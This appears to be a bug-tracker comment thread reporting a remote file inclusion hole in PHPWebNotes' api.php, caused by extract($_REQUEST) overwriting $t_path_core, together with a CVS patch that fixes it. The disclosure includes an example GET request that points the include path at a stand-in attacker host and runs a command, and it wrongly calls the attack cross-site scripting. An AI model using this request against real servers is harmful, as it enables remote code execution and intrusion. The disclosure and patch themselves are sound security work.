# The $g_ext can not be used before the custom config is included.
require_once( $t_path_core . 'php_api.php' );
+ # that might have done evil things to our globals - fix them
+ $t_path_main = dirname( dirname( __FILE__ ) ) . DIRECTORY_SEPARATOR;
+ $t_path_core = $t_path_main . 'core' . DIRECTORY_SEPARATOR;
require_once( $t_path_core . 'constants_inc.php' );
require_once( $t_path_core . 'config_defaults_inc.php' );
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
don't use this software until it is fixed. our server got hacked that way.
the bug is in php_api.php line 77:
extract($REQUEST);
this allowes to change $t_path_core which is used in api.php:
require_once( $t_path_core . 'constants_inc.php' );
this can be used for a cross site scripting attack.
how does it work:
GET http://server/xxxxx/api.php?t_path_core=http://pathtohackingtool?&cmd=id
The concrete bug is fairly easy to fix, but of course the right action would be not to use those globals at all.
--- webnotes/core/api.php 19 Aug 2005 14:52:46 -0000 1.1
+++ webnotes/core/api.php 24 Sep 2005 16:29:31 -0000
@@ -17,6 +17,9 @@
# The $g_ext can not be used before the custom config is included.
require_once( $t_path_core . 'php_api.php' );
+ # that might have done evil things to our globals - fix them
+ $t_path_main = dirname( dirname( __FILE__ ) ) . DIRECTORY_SEPARATOR;
+ $t_path_core = $t_path_main . 'core' . DIRECTORY_SEPARATOR;
require_once( $t_path_core . 'constants_inc.php' );
require_once( $t_path_core . 'config_defaults_inc.php' );